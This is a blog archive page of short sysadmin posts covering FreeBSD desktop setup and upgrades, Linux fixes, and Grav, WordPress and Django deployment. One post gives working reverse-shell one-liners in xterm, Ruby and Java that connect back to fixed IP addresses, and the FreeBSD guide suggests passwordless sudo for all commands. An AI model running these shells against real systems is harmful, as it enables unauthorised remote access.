The “engineering” category is for posts related to network and systems engineering. These consists of how-tos, walkthroughs, configuration files and thing computer engineers would find similarly useful.

Building a perfect FreeBSD desktop workstation

Building a FreeBSD Workstation

installing and configuring a freebsd desktop

Building a FreeBSD desktop doesn’t have to take you several days. It doesn’t even have to take longer than an hour.

Of course, you can take your time and compile your own optimized FreeBSD kernel, specifically for your hardware. And, build everything from source using the ports tree. But, many of you, like me, just want to get a graphical FreeBSD desktop up and running before you bother with all of that.

So, for those of you that aren’t familiar with this method, allow me to show you how to install and configure any popular FreeBSD desktop environment, in under and hour (give or take).

Install the FreeBSD Base System

A FreeBSD desktop typically consists of two main parts. Traditionally, you will have a server and a client. The server is usually referred to as your “display manager”, and the client is usually referred to as a “window manager”. These can be a pain in the ass to configure, by hand, if you don’t have the FreeBSD manual to constantly refer to. And, getting all of the various settings just perfect can be nearly impossible without help or lots of time. So, we’re going to do a generic installation, just to get up and running. We can always optimize our FreeBSD desktop later.

Boot the FreeBSD installer from official media

Go ahead and find the FreeBSD installation media appropriate for your architecture. They should be listed on FreeBSD’s official website. I’ll be working with FreeBSD 12.1-RELEASE and the amd64 architecture, for the purposes on this tutorial. I usually use KVM/libvirt/QEMU for virtualization. But, for the purposes of this blog post, I am going to use Oracle’s VM VirtualBox. If the reasons for that aren’t immediately clear, it’s because it tends to be used more frequently.

That, and I’m slightly certain the KVM/libvirt/QEMU crowd don’t need this tutorial.

oracle's vm virtualbox dashboard, select New to create a new virtual machine

From Oracle’s VM VirtualBox dashboard, select New to create a new virtual machine. This virtual machine will host our FreeBSD desktop environment.

After selecting New from the dashboard, VirtualBox should open another window. Here you can name your virtual machine. This is where you set your default hostname. You can change it later, if you want. Select ‘Next’

oracle's vm virtualbox name virtual machine

Then it will ask you how much RAM you want to allocate. I have a large amount of RAM, so I allocated 20GB. I don’t expect you to have that much, nor will you need it. But, you should be generous with your RAM and your desktop environment. These days, I’d say, go ahead and give it 4GB or mroe. But, you can certainly get by with much, much less.

After that, you’ll select the type of virtual disk image you’d like, this is your virtual harddisk. I selected virtual disk image or ‘VDI’. And, I allocated a decent amount of space for the desktop software. You’ll need a bit more, if you decide to compile the desktop from source than if you simply install packages from the binary package repository. So, bare that in mind, when you decide how much space to give your machine.

The type of workstation you want should factor in to how much virtual harddrive space you allocate, as well. So, a more full-featured desktop like Gnome or KDE should be allocated more space than their lightweight desktop counterparts, like XFWM, LXQT, awesome, etc..

oracle's vm virtualbox allocate ram for new freebsd virtual machine
oracle virtualbox creating a harddrive
oracle virtualbox selecting virtual harddrive type virtual disk image
virtualbox dynamically allocate disk space

I selected dynamically allocated, because my hardware isn’t going to see much of a performance boost from being preallocated. Though, in all cases it would help to be preallocated. Once you’ve finished doing all of that, you should find yourself back at the VirtualBox dashboard.

Configure the base system to install FreeBSD

Once you boot into the installation program, go ahead and select ‘Install’. After that you’ll need to tell it your keymap, if it has not automatically detected it. For a lot of you that’s going to be ‘US’ for United States. Next, it’ll ask you to select a hostname for the base system. And finally, you’ll partition your harddrive and select some default packages to have installed.

setup freebsd desktop workstation boot menu
freebsd workstation installation select install
freebsd installation select hostname
freebsd installation select hostname

Partition your hard drive and select FreeBSD packages

FreeBSD has an amazing file system called ZFS that you should checkout. It’s pretty much better than sex. I highly recommend it. But, again, for the purposes of this video, I’m selecting UFS. UFS is also a great file system. FreeBSD has some amazing technology that is all worth investigating.

I also chose to install FreeBSD onto a single partition, which isn’t exactly recommended, but it’s an option. This was for the sake of ease while writing the article. If you’re a first time user or otherwise can’t be bothered to manage multiple partitions, one partition that takes up your entire virtual disk will be fine for you as well.

For my boot partition I chose Master Boot Record or ‘MBR’, BSD and GPT are also acceptable.

freebsd installation partition entire disk

Set FreeBSD’s local root password

It’ll now prompt you to set the password for root. Root is what you think, it’s your superuser account. A notable difference between root on linux and BSD is the ‘wheel’ group. Be sure to select a very strong password for your root account. Any compromise of the superuser account would mean that the entire machine was compromised.

setup freebsd set root password and then create a user

Setup networking for FreeBSD

Now, since I chose a network installation, I am required to setup networking or quit. You may be able to continue without doing so. Hopefully it will detect your network device, most of yours will be built-in. If not, you should attach it before proceeding and see if it will detect it.

As well, most of you will want to select DHCP for a dynamically allocated network. If not, you can punch in your static network settings at this time. For IPv6 enabled networks, your DHCP option is likely called SLAAC. Go ahead and enable that, if you need it.

Next you’ll set the system’s timezone. For me, that’s AmericaNew_York. So, I selected North America, United States and then Eastern (most areas). You should select the appropriate timezone as it applies to your system.

setup freebsd networking

Select FreeBSD boot services and hardening options

Now you’ll select which services to start with FreeBSD at boot time. For my purposes, I chose to enable SSHD for remote shell access and ntpdtime so my clock would synchronize with internet time servers at boot. This is a pretty critical stage. But, for building a workstation, you’ll mostly only need to be sure your time syncs appropriately here.

For the FreeBSD hardening options, you can safely enable them. However, some of the options will make debugging difficult, if you’re a developer. Since this is a daily driver, a workstation or otherwise a desktop. I strongly recommend you disable sendmail, as you should only have a need for local mail and remote logging as you shouldn’t need to access your log files on a remote server. Again, if you can justify leaving them enabled, then go ahead.

I find it very useful to clear /tmp at boot time. This is a performance option that I prefer and recommend.

freebsd boot options
freebsd add user options

After that, you’ll create your first user and set a password for that account. And you may proceed to create any other user accounts that you think you might need or want. I chose to add my user to the wheel group. At this point the base installation is finished. You’re going to exit the installer and reboot into the system. So you can start building it. We’re going to dive straight in, so when you get a chance be sure to remove your installation media before rebooting. Reboot. :)

Reboot into FreeBSD and perform a distribution upgrade

If you fail to reboot the installation media, it will you boot your back into the installer. It’s okay for that to happen. Just be sure to remove the media at that time and hit CTRL-ALT-DELETE to reboot again. Then select Multi-User at the boot options screen and login with your ‘root’ account to prepare the system for it’s desktop environment.

We have a few small configuration changes to make manually. Actually, for our purposes of getting into a desktop early. We’re just going to install the packages we need to function, make sure the system is up-to-date and configure them..

One you’re logged in, run the following two commands to check for core FreeBSD system updates, download and install them. In the case that you did have available updates to install, follow the instructions on screen and reboot.

freebsd-update fetch && freebsd-update install
build a freebsd desktop first boot menu
buid a freebsd daily driver desktop
freebsd-update fetch && freebsd-update install

Install sudo and FreeBSD’s desktop-installer

pkg install sudo desktop-installer

Now, I kind of let it correct me here. Because, it’ll ask to update your binary package repository for you, when you ask for it to install the first package. You’ll want to accept that, so you have the latest version of the desktop-installer script.

Once that’s complete, edit the ‘/usr/local/etc/sudoers’ file and add the user you created to sudoers. This way, when you’re logged into the desktop shortly, you can login as your user and sudo to root to configure to configure the system or install other desired packages.

If you’re unsure how to add your user account to sudoers, open ‘/usr/local/etc/sudoers’ by typing ‘edit /usr/local/etc/sudoes’, searching for the uncommented like that reads ‘root ALL=(ALL) ALL’ and below it add ‘<your username> ALL=(ALL) NOPASSWD: ALL’

This will enable that user account to use the sudo command and run commands as rootl

After that, run the desktop-installer to begin install your FreeBSD daily desktop workstation.

building a freebsd workstation, adding user to sudoers file
building a freebsd desktop - running desktop-installer script

FreeBSD’s desktop-installer script works very well!

Now, most of this script should be self-explanatory and it actually doesn’t take that long to run (depending on your FreeBSD workstation’s specifications. But, I’ll walk with you through it anyway. Because, perhaps you’re not familiar with “BSDisms”.

Right away, it asks us if you want to install and configure a firewall. As a workstation this is a big yes. It’ll warn you that changing your firewall settings runs the risk of disconnecting your SSH session. Really, this is rarely the case, unless your keep-alive is about to time out or something, between reading here and acting there. The danger would be more along the lines of if you get disconnected. So, if you happen to close the SSH port, or if you’re unsure, be sure to make sure your SSH port is not blocked before you disconnect.

Finally, it should ask if you want to update to the latest and greatest binaries/ports tree or use the quarterly snapshot release. We want the latest and greatest. For one, we want our desktop-installer script to be as current as possible, so that if there’s any quirks in hardware drivers that have been patched, we get the fixes. But, for second, generally we want the latest and greatest on FreeBSD. May the daemon be with you and give you the power to serve! ;)

You can choose either, but when it asks how you’d like to update your copy of the repository, I prefer ‘portsnap’.

freebsd workstation build update repository

Desktop-installer for FreeBSD: Round 2

Once the repository finishes updating, the desktop-installer script will restart. It can take a while, FreeBSD developers release early and often. So, now it should remember our selections and we can jump right through to selecting a desktop environment to work with.

For firewall type, I chose option 5 (protect this machine only using stateful rules). This is likely the option you want, but, as always, if your goals are different from mine, choose the option most appropriate. Take this moment, if you have another machine to verify that your SSH port is still going to be open, if you fear that it has closed. That is, if you are installing over SSH, I mean.

Next it’ll prompt if you want to update. Fuck yeah, you definitely do. Go ahead and agree to that and it’ll restart. This should be the last restart before we’re booting into a desktop. :)

freebsd desktop-installer select a firewall type
freebsd desktop-installer reboots for the last time

It’s time, finally installing a desktop environment for FreeBSD

When you boot back up, you can run the desktop-installer script for the final time. It will have remembered your earlier selections, but you should still pay close attention to be sure nothing has gone wrong. Remember, again, that when you reach the point of updating your repository to be current instead of quarterly, you should select ‘no’ or else you’ll be back in that loop.

select a desktop environment for freebsd

I actually chose KDE this time, just to see if it would successfully pull down my preferred desktop. Generally, when I’m at this stage of a configuration, I go with a smaller desktop environment, just to get up and running quickly. And, the lattest is what I recommend to you.

LXQT, MATE, XFCE4, Lumina, IceWM, WindowMaker and fluxbox are all such options. Among them I favor MATE and LXQT, depending on whether I want GTK or QT respectively.

 

Fast and easy, proper FreeBSD workstation setup

freebsd desktop successfully set up. kde plasma

And there you have it. A proper, fast and easy FreeBSD desktop deployment. Enjoy!

2020-08-11T21:45:39-04:00August 3rd, 2020|Categories: Engineering|Tags: , , , , , , , , , , , |

Execute a Command on All Files in a Folder

Run a Command Against All Files in a Folder

How to rename all files in a folder:

For a very long time, Microsoft Windows did not ship with Powershell. In fact, it did not ship with any kind of shell and all.

So, when Windows users would ask me about Linux, or any other operating systems, that was one of the main things I would point out to them. At least, if they were “tech savvy”, the raw power of having a shell versus “just a command prompt”. And how scripting in the command line, on the fly is invaluable. I’m sure it’s invaluable everywhere, but I found it especially invaluable in the security world

Here’s a one line command to create a “for loop” and execute that command on each file found in a particular folder:

for i in *;mv "$i" "$i.conf"; done

Yup, it’s that easy in BASH.

The above command will iterate (duh) the ‘move file’ command and append ‘.conf’ to the end of the filename, by “moving” those files to the same folder but with .conf added to their name. Yes, it does essentially just rename them.

You’re welcome and remember to wash your hands.

2020-07-01T16:00:15-04:00June 23rd, 2020|Categories: Engineering, One Liners|

locale: Cannot set LC_ALL to default locale: No such file or directory

 

Cannot Set Default Locale

 

 

This time, as almost every time before it, it is all my fault. I decided to use an untested tool, to help with my clean up tasks, during some maintenance and I am paying the price. I just reconfigured the default locale, one of the first things you configure when you’re installing linux.

 

 

This is the second problem I’ve bumped into and I realize now that I’ve bungled my /etc/. Being an engineer, this is okay. But, for some of you, this would be reinstall time. Allow me to rewind.

 

 

cannot set default locale
cannot set default locale

 

 

Suddenly, I can’t use ‘sudo’. Have I been hacked?

 

 

I was alarmed during the maintenance, because suddenly it seemed as if my password had changed or I otherwise could no longer use ‘sudo’. I also tried to switch users with ‘su’, into root, and that wasn’t possible for me either. You may find this odd, but that was actually a relief.

 

 

Obviously, I was aware that I was doing maintenance and cleaning up file lint (in this case, a lot of “.pacnew” files in etc, as well as “.old” had begun to pile up). In my haste to make good time and get back to work, I went ahead and told a particular tool to go ahead and replace the files with the “.pacnew”. I should’ve made sure to check that it was going to replace /etc/shadow. But, I didn’t.

 

 

Restoring /etc/shadow on Manjaro

 

 

Realizing the problem, I powered down and grabbed my bootable USB stick, loaded with a Manjaro installation image. For this trick, you can likely use any bootable linux distribution. I’d even recommend a distribution that is intended to be run from removable media. Because, that way, if you find your situation to be much worse, you have more tools are your disposal.

 

 

It booted into the live linux just fine. I unlocked my encrypted drive and mounted it. Browsing to the ‘etc’ folder, I was fortunate enough to find my shadow.old file sitting there. As well, I can proudly say that it did have the correct permissions set as well. So, my backup shadow file was not exposing sensitive secrets. An easy fix for me, but what if you don’t have your old shadow file?

 

 

In that case, the go-to fix is to set the password to a known value, so you can copy and paste it into other accounts, to restore normality. Once you’ve achieved that, you can reset those other accounts to stronger passwords once more. Let’s get back to the default locale issue.

 

 

cannot set default locale
cannot set default locale

 

 

locale: Cannot set LC_ALL to default locale: No such file or directory

 

 

Now, I’m familiar with why this happens. But, I was a little annoyed this time. Normally, a quick export LC_ALL=en_US.UTF-8 solves all problems (for Americans speaking English, anyway.. your default locale may be different). Well, that’s only because you’re used to SSHing into your linux machines. I realized, the second time I launched a terminal and the problem had returned, that I had done more damage before than I originally thought.

 

 

But, the optimist in me wanted to think that maybe wasn’t the case. So, I waded through all of the other possible default locale issues and the people responding, and upvoting, the above export LC_ALL fix. Turns out, often, someone has changed a profile setting, or other preference, in their terminal emulator (this is possible, it just wasn’t my problem). So, I check those and still nothing.

 

 

Finally, I bother to check /etc/locale.gen. Sure enough, it is default, everything is commented out. So, for me the fix was to purge my locale, uncomment my preferred locale in /etc/locale.gen and run locale-gen with sudo or otherwise as root.

 

 

All in all, I’m just taking this opportunity to allow errors to crop up, so that I can blog about fixing them.

 

 

Work your way back from system wise to local user applications.

 

 

If your locale issues keep coming back, exporting the appropriate default locale is only a temporary fix for that session, you’ll be wanting to check your terminal emulator (if applicable), local “dot files” that manage those settings and above all your system wide configuration. To save time, it’s best to actually do that in the other order. Start with the system wide configuration and work your way back into user configurations and finally down to specific applications.

 

 

Don’t let little problems ruin your day. Hire Gray Hat Freelancing to troubleshoot your next issue, fill out our form and we will give you a free consultation! We are “DevSecOps”, we do everything.. or, at least, it’s easier to list the things we can’t do. So, check us out!

 

2020-07-07T01:59:31-04:00May 28th, 2020|Categories: Engineering, Random Fixes|Tags: , , , |

Installing Grav CMS from the Terminal

installing grav cms from the terminal

Installing Grav CMS using the Command Line

Grav CMS is a great flat-file CMS written in PHP. It’s been around for a while and features plenty of themes and plugins. Though, the community around it tends to roll their own.

Written in twig, php, css, html and markdown. Grav finds itself one of the fastest CMS out there. It’s a real competitor to WordPress and Drupal, especially if you have a good web developer. Lets deploy one, so we can play with it.

installing grav cms from the command line

installing grav from command line

How to get Grav and where to extract it.

Grab the latest zip from https://www.getgrav.org or https://github.com/getgrav/grav. Note: If you choose to use github and do not plan on doing and core development on the CMS, it’s a better idea to get a zip from the website or the Releases tab on GitHub.

Once you have the latest release, go ahead and sftp it up to your webserver and follow right behind by SSHing in. Extract the compressed release archive and move all of the files into webroot. Be careful not to forget hidden files, often “dot files”, like ‘.htaccess’.

Internal Server Error – How to fix Grav’s file permissions.

fixing file permissions for a grav install

Now that that’s out of the way, all we need to do is fix the file permissions and we’re up and running. Once we check that, we should go ahead and install some useful bits.

how to install grav from the terminal

fixing file permissions during a grav cms install

I’m going to grab the admin plugin, so I can manage Grav’s flat file CMS from the comfort of a web GUI. Please note, that if you decide to do the same, you’ll want to break out your web browser again. So you can register an admin on the world’s fastest flat file CMS before some random miscreant comes by and does it him or herself.

grav cms deployment from the terminal

installing grav’s admin panel

Now you can pick a theme and start blogging with Grav!

setting up grav using only the terminal

Grav CMS’ administration panel

If you need any kind of back end server work, Gray Hat Freelancing is eager to help. Fill out this form for a free consultation!

2020-07-23T06:53:46-04:00May 27th, 2020|Categories: Engineering|

nss: p11-kit-trust.so exists in filesystem

error-failure-while-downloading-nitrux-icon-theme
ERROR: Failure while downloading nitrux-icon-theme

 

Arch/Manjaro Update Fails Downloading nitrux-icon-theme_3.5.3.tar.gz

 

I really hope this didn’t stump any of you. It’s okay, if it did, you probably didn’t use the console and therefor probably didn’t see what actually failed. So, the link to the package, nitrux-icon-theme_3.5.3.tar.gz, is dead. Which makes it kind of hard for the PKGBUILD script to download it, build it and install it.

 

Locating the missing source for nitrux-icon-theme on the AUR

 

And, if you run a quick pacman -Qi nitrux-icon-theme you quickly see there’s supposed to be a nitrux website at https://nitrux.in/. But, trying to go there, you can see they closed their doors. The project forked into two projects now known as NX Desktop and Nitrux OS.

 

I’m probably wrong (according to my girlfriend, I am always wrong), but since the launchpad.net team references the Nitrux OS domain, and it was the last source in the PKGBUILD in the AUR, I kind of assume it was the more “official” source (at least as far as following the package maintainer’s intent). Looking quickly at their website, we get sent off to trusty old GitHub where the repository is now Archived (this means, no longer supported).

 

Quick patching the PKGBUILD file for missing source nitrux-icon-theme

 

There’s a chance here the AUR package maintainer has noticed this and simply wants the package to die. He’s not responded to quite a few comments on the AUR as well. Anywho, here’s the fix:

 

error downloading sources nitrux-icon-theme
Edit the PKGBUILD for nitrux-icon-theme

 

  • Grab the latest release from GitHub: https://github.com/Nitrux/nitrux-icon-theme/archive/3.5.4.tar.gz
  • run md5sum on the gunzipped tarball
  • rerun pacman with –editmenu so it asks if you want to edit the PKGBUILD file
  • Select any option that allows you to edit the PKGBUILD file (for me, using yay this was [A]
  • Update the source field with the latest available release
  • Update the md5sum field with the m5sum command’s output
  • Write and exit the PKGBUILD file
  • Continue the installation

 

ERROR: Failure while downloading nitrux-icon-theme – Fixed! Quickly!

 

wget https://github.com/Nitrux/nitrux-icon-theme/archive/3.5.4.tar.gz
md5sum 3.5.4.tar.gz
yay --editmenu -Syyu nitrux-icon-theme

 

Check out other random fixes on Gray Hat Freelancing.

2020-07-11T01:46:14-04:00May 22nd, 2020|Categories: Engineering, Random Fixes|Tags: , , , , , |

One Liner Reverse Shells, Remote Desktop Edition

one line reverse shell xterm
one line reverse shell using xterm

 

So, it’s been a little while, since I shared some one line reverse shells with you guys. Here are a few “obscure” ones, if you ever find the need for them. I do not recommend bothering with the remote Xsessions. But, to each their own.

 

Xterm One Line Reverse Shell

 

You’ll need to listen on port 6001 using a tool like xnest, try xnest :1 and then:

 

xterm -display 10.0.0.1:1

 

Boom! Remote desktop.

 

Ruby Reverse Shell in One Line

 

Listen on port 1234, obviously.

 

ruby -rsocket -e'f=TCPSocket.open("172.16.16.169",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

 

Java One Line Reverse Shell

 

This one is cross-platform, as Java always tries to be. Listen on port 2002

 

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/172.16.16.169/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()

 

 

2020-07-07T02:09:47-04:00May 20th, 2020|Categories: Jeet Kune Crypto, One Liners|Tags: , , |

Post Thousands of Products on WooCommerce Instantly

How to Post Thousands of Products on WordPress Instantly

Importing large amounts of product data into WordPress / WooCommerce can be a daunting task. Here’s how you can instantly publish thousands products on WooCommerce using the terminal.

mysql -u dbuser -p dbname
update wp_posts set `post_status` = 'publish' where `post_type` = 'product';
publish thousands of products instantly
If you guessed that we’d use the command line. to publish thousands of products, good for you. :)

SQL databases are awesome! That’s right, and you can simply change ‘publish’ to ‘draft’ to delist thousands of products as well. You should take a look through wp_postmeta and see all the various meta keys you can use to filter products and work with your catalog through the command line. It’ll save you time and money.

2020-07-24T10:26:35-04:00May 11th, 2020|Categories: Engineering, One Liners|Tags: , |

The Fastest Way to Upgrade FreeBSD 11 to FreeBSD 12

How to Quickly Upgrade FreeBSD 11 to FreeBSD 12

Ever need to upgrade FreeBSD to the next release? It’s not hard! We can compile kernels some other day. Today, we’re just going to do binaries. Quick and easy, FreeBSD is the best.

Go ahead and log in to your machine, elevate yourself up to root (or use sudo). Lets get this show on the road: freebsd-update fetch

freebsd-update fetch & freebsd-update install

freebsd-update fetch && freebsd-update install
upgrade freebsd 11 to freebsd 12
upgrade freebsd

This process is not hands off. So, you’ll need to accept a few prompts. Generally, this is the only time you’ll really have to reboot FreeBSD, if you’ve been treating it well. But, in this case, I don’t run into the need for that (heh).

Once the update tool finishes grabbing all of the patches and applying them. We’ll need to update the pkg tool. The pkg tools is used to maintain binary packages on the system. If you’re a sane person, you either use pkg or the ports tree. The sanest people build binary packages from ports and keep a local repository, but that’s for another article.

upgrading freebsd 11 to 12 from the terminal
upgrade FreeBSD 11 to 12

Upgrading Binary Packages on FreeBSD

This tool keeps things as simple as they can be. So, if you’re familiar with POSIX compliant systems, you’ll recognize this process. Let’s continue to upgrade FreeBSD 11 to FreeBSD 12.

Use the static pkg binary to update the tool and then all of the installed packages. Again, I’m just going to go ahead and bang it one in one line. Any time you see me use &&, you can safely break the command into two commands, if you want. It is two commands anyway, just on one line.

pkg-static upgrade pkg && pkg upgrade
upgrading freebsd packages with pkg-static
using pkg-static to upgrade pkg tool
freebsd's pkg-static has upgraded the pkg tool
pkg-static upgrade pkg success
using pkg upgrade to upgrade freebsd 11's binary packages
use pkg upgrade to upgrade freebsd’s binary packages

Yeah, that’s a lot of packages. Let’s make sure we’re on the latest FreeBSD 11 release, which should be FreeBSD 11.3

uname -a
checking freebsd 11's minor version with uname -a
uname -a freebsd 11.3

Completing the Upgrade FreeBSD Process

Good. Now we can get back to upgrading the kernel to the next major release. Time’s running out for security updates for 11.3 and we don’t want to still be around, once it does. Back to the freebsd-update tool

freebsd-update upgrade -r 12.0-RELEASE
upgrading freebsd 11 to 12 - almost there
freebsd-update upgrade -r 12.0-RELEASE
ugprading freebsd 11 to freebsd 12 requires A LOT of patches
freebsd-upgrade -r 12.0-RELEASE

This one will take a while. It should inspect your system and ask you if you agree with what it has found, then it should go grab a matching FreeBSD 12 image to apply on top. Now we will need to reboot. But, take a walk, if you want, make a sandwich or whatever.

We’re almost done. We need to check some things and that’s about it after this. You can e-mail me if you want me to do any of these things for you. Please do not forget that. It’s how I put food on the table.

Next Time Don’t Wait So Long to Upgrade FreeBSD!

freebsd-update finally breaks free
freebsd-update install (going to freebsd 12)

You guessed it! We’re going to go ahead and apply all of those, oh so many, packages. Run freebsd-update install

freebsd-update install

It goes fast than you’d think. And, since we’ve finished patching away from FreeBSD 12. We now need to reboot and finish the final details of this FreeBSD version upgrade.

reboot
freebsd-update install

Congratulations! See how easy that was? I really love FreeBSD!

Apparently it wants us to run freebsd-update install three times, this time. If you compiled packages from ports. You’ll absolutely need to do this. And, if you didn’t, you’ll want to do this anyway because it removes a bunch of file lint that you’d otherwise have to do yourself.

Either way, welcome to FreeBSD 12.0-RELEASE!

freebsd-update install
uname -a
upgraded to freebsd 12.0-RELEASE
FreeBSD 12.0-RELEASE

The hackers at Gray Hat Freelancing are here to help you with any project you have that’s IT related. Tell me what you want to do and I’ll tell you how I can help you achieve that end. Have a good one!

2020-07-24T10:27:27-04:00April 28th, 2020|Categories: Engineering|Tags: , |

p11-kit-trust.so exists in filesystem – Quickly Fixed!

Yikes! This page went to shit during migrations. I apologize for that. I will make a note to pay better attention to my SEO errors. The gist of this blog post was covering errors around “yay build file exists“. So, I’ll rebuild it from memory, the best I can. Hope this helps!

error: failed to commit transaction (conflicting files)

yay build file exists

yay build file exists

yay build file exists

yay build file existssudo pacman -Syyu –overwrite /usr/lib/p11-kit-trust.so –overwrite /usr/lib32/p11-kit-trust.so

This worked out just fine for me. The files were safely overwritten and the machine continue to function without any problems. So, if it’s simply a matter of an existing file that’s not shared by other packages, feel free to overwrite it.

yay build file exists

2020-07-14T00:05:36-04:00April 20th, 2020|Categories: Engineering, Random Fixes|Tags: , , , |

WordPress Deploy from Termux, Hilarious

WordPress Deploy from Termux

Here I am, using performing a wordpress deploy from termux. Using only my cell phone, I launch termux and SSH into my laptop. I create a linux debian virtual machine. Then I connect to that machine, update linux debian 9 aka “buster” to current, linux debian 10 aka “sid”.

wordpress deploy from termux
WordPress Deploy from Termux & Debian Buster Updated to Sid

LAMP Installation and Configuration from Termux

From there, I turn it into a LAMP server. This means I install Apache, MariaDB (a stand-in for MySQL) and PHP. I configure Apache for php-fpm and mpm_event (in a rough way), the I install all the PHP modules required to run WordPress.

MySQL Administration from Android Linux

I also lockdown MariaDB with mysql_secure_installation. I use mysql from command line to create a SQL database and a password protect SQL database user, give the SQL database user access to the SQL database.

I proceed to downloading wordpress and extract it to web root. I set the write file ownership and file permissions for the Apache web server. Finally, I open a browser and configure wordpress’s install script and run it. Followed by creating an administrative user. Completing the first half of my adventure doing a wordpress deploy from termux

wordpress deploy from termux

wordpress deploy from termux

WordPress Installation from a Mobile Phone

I forgot my wordpress administrative password. So, I backup the files and database. Power down the virtual machine. Destroy it. And then I build a new one. But, this time I upgrade linux debian 9 “buster” to linux debian 10 “sid”, or the “bleeding edge”. It’s also known as the unstable branch. I, again, turn it into a LAMP server. And, finally I restore wordpress, from the backup that I made, in the exact same way that you’d recover wordpress from a disaster. Like, if you were hacked or suffered a similar disruption.

WordPress Disaster Recovery

Essential WordPress disaster recovery. And I do it all from my smart phone, using Termux on Android.

https://www.youtube.com/watch?v=pD1piFpAmiY

Network and Systems Engineering from a Linux Android device
Freelance Gray Hat Hacker for Hire

2020-09-02T05:50:39-04:00April 19th, 2020|Categories: Engineering, Errata|Tags: , |

Quickly Configure Up Django on WAMP (mod_wsgi & Windows 7)

You should note that I do not advise running Microsoft Windows. Or any software that is end-of-life, unless you are able to patch it yourself. And, so, I especially do not advise people to go configure Windows 7 to host Django using mod_wsgi

 

Configuring Django on a WAMP Host

 

 

Getting Apache ready for Django, on a WAMP host machine, can sometimes be problematic. Particularly because setting up mod_wsgi on Windows (in this case Windows 7) isn’t always straight forward. I’ll be using the deprecated Python 2.7 on Windows with WampServer installed.

 

django on wamp
Why me?!

Install the mod_wsgi Apache module

  1. Download mod_wsgi-win32-ap22py27-3.3.so. Or download your respective .so compatible file
  2. Change its name to mod_wsgi.so and
  3. Copy it to $DRIVE/Program Files/Apache Software Foundation/Apache22/modules 
  4. Open httpd.conf as Administrator, or equal. Here, you’re going to find a list of lines with “LoadModule” followed by a bunch of other “.so” files. Simply add LoadModule wsgi_module modules/mod_wsgi.so to that list.
  5. Restart Apache.

 

django on wamp
Django on WAMP :(

 

Creating Configuration Files for Django on WAMP

 

  1. Next you have to point it at Django
  2. In your Django project root folder, create an apache folder
  3. Change into that directory and create a file named django.wsgi
  4. And, finally create a file named apache_mydjango.conf
  5. Go back to apache’s httpd.conf and add the following line at the bottom of the page: Include "$DRIVE:/projects/mysite/apache_django_wsgi.conf"
  6. Now put these lines in django.wsgi:

 

Populating Configurations for Django on WAMP

 

import os, sys

sys.path.append('D:/projects/mysite')
os.environ['DJANGO_SETTINGS_MODULE'] = 'mysite.settings'

import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()

 

  1. Open apache_djang_wsgi.conf and prepend:

 

Alias /images/ "D:/projects/mysite/templates/images/"
<Directory "D:/projects/mysite/images>
Order allow,deny
Allow from all
</Directory>

WSGIScriptAlias / "D:/projects/mysite/apache/django.wsgi"

<Directory "D:/projects/mysite/apache">
Allow from all
</Directory>

<VirtualHost *:80>
    DocumentRoot D:/projects/mysite
    ServerName 127.0.0.1

</VirtualHost>

 

Finished Setting Up Django on Windows!

2020-07-01T18:11:40-04:00April 18th, 2020|Categories: Engineering|Tags: , |

The Best FreeBSD Kernel Config as a VirtualBox Guest

About our FreeBSD Kernel Config

This is what we, at Gray Hat Freelancing, use for a FreeBSD kernel configuration when FreeBSD is running on VirtualBox as a guest. This is one of the smallest possible FreeBSD kernel configurations. There’s a little more you could trim off, but not a lot.

smallest possible freebsd kernel config for virtualbox
the power to serve

It’s highly recommended that you run FreeBSD as a VirtualBox host. But, if you must run it as a guest, why have all the extra kernel modules, right? I’ll help you compile this FreeBSD kernel configuration in another post, as well.

If you were a regular visitor before, you’ll recognize this. This is the configuration I was using to build out a new version of BSDeviant. Sadly, that project was tabled for now. UnixPunx just doesn’t seem to want to breathe again. Oh well, moving on.

FreeBSD Kernel Configuration for VirtualBox Guests

cpu             HAMMER
ident VBOX

options SCHED_ULE # ULE scheduler
options PREEMPTION # Enable kernel thread preemption
options INET # InterNETworking
options INET6 # IPv6 communications protocols
options IPSEC # IP (v4/v6) security
options TCP_OFFLOAD # TCP offload
options SCTP # Stream Control Transmission Protocol
options FFS # Berkeley Fast Filesystem
options SOFTUPDATES # Enable FFS soft updates support
options UFS_ACL # Support for access control lists
options UFS_DIRHASH # Improve performance on big directories
options UFS_GJOURNAL # Enable gjournal-based UFS journaling
options QUOTA # Enable disk quotas for UFS
options NFSCL # Network Filesystem Client
options NFSD # Network Filesystem Server
options NFSLOCKD # Network Lock Manager
options NFS_ROOT # NFS usable as /, requires NFSCL
options CD9660 # ISO 9660 Filesystem
options PROCFS # Process filesystem (requires PSEUDOFS)
options PSEUDOFS # Pseudo-filesystem framework
options GEOM_PART_GPT # GUID Partition Tables.
options GEOM_LABEL # Provides labelization
options COMPAT_FREEBSD32 # Compatible with i386 binaries
options SYSVSHM # SYSV-style shared memory
options SYSVMSG # SYSV-style message queues
options SYSVSEM # SYSV-style semaphores
options _KPOSIX_PRIORITY_SCHEDULING # POSIX P1003_1B real-time extensions
options PRINTF_BUFR_SIZE=128 # Prevent printf output being interspersed.
options KBD_INSTALL_CDEV # install a CDEV entry in /dev
options HWPMC_HOOKS # Necessary kernel hooks for hwpmc(4)
options AUDIT # Security event auditing
options CAPABILITY_MODE # Capsicum capability mode
options CAPABILITIES # Capsicum capabilities
options MAC # TrustedBSD MAC Framework
options INCLUDE_CONFIG_FILE # Include this file in kernel
options RACCT # Resource accounting framework
options RACCT_DEFAULT_TO_DISABLED # Set kern.racct.enable=0 by default
options RCTL # Resource limits

# Make an SMP-capable kernel by default
options SMP # Symmetric MultiProcessor Kernel

# CPU frequency control
device cpufreq

# Bus support.
device acpi
options ACPI_DMAR
device pci
options PCI_IOV # PCI SR-IOV support

# ATA controllers
device ahci # AHCI-compatible SATA controllers
device ata # Legacy ATA/SATA controllers
options ATA_STATIC_ID # Static device numbering

# ATA/SCSI peripherals
device scbus # SCSI bus (required for ATA/SCSI)
device da # Direct Access (disks)
device cd # CD
device pass # Passthrough device (direct ATA/SCSI access)
device ses # Enclosure Services (SES and SAF-TE)
#device ctl # CAM Target Layer

# atkbdc0 controls both the keyboard and the PS/2 mouse
device atkbdc # AT keyboard controller
device atkbd # AT keyboard
device psm # PS/2 mouse

device kbdmux # keyboard multiplexer

device vga # VGA video card driver
options VESA # Add support for VESA BIOS Extensions (VBE)

